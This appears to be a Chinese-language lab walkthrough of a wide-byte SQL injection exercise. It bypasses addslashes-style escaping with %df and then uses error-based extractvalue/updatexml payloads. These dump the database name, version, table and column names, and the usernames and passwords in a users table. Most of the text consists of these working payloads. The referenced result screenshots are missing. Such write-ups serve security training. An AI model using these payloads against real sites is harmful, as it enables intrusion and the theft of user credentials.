1、尝试进行注入
输入语句,账号:1\
,密码:1\
,返回页面如下:
发现该关还是会向危险字符自动添加斜杠。
2、中和干扰符
输入语句
?id=1%df\
,返回页面如下:
我们发现无法中和反斜杠。
3、使用burp工具进行注入
截取数据包,进行注入,输入语句
1%df'
,返回页面如下:
出现报错,说明单引号逃逸成功。
4、确定注入方式
我们发现该网站会返回报错信息,直接使用报错注入吧
5、爆破数据库名、用户名、版本
输入语句
1%df'+and+extractvalue(1,concat(0x7e,database(),0x7e,user(),0x7e,version(),0x7e))#
,返回页面如下:
6、爆破数据表名
输入语句
1%df'+and+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),0x7e),1)#
,返回页面如下:
7、爆破字段名
输入语句
1%df'+and+updatexml(1,concat(0x7e,(select+group_concat(column_name)+from+information_schema.columns+where+table_name=0x7573657273+and+table_schema=database()),0x7e),1)#
,返回页面如下:
8、爆破字段内容
输入语句
1%df'+and+extractvalue(1,concat(0x7e,(select+group_concat(concat(id,0x7e,username,0x7e,password))+from+users),0x7e))#
,返回页面如下:
'
我们发现返回的信息不完全,我们将语句改为:
1%df'+and+extractvalue(1,concat(0x7e,mid((select+group_concat(concat(id,0x7e,username,0x7e,password))+from+users),31,31),0x7e))#
,返回页面如下: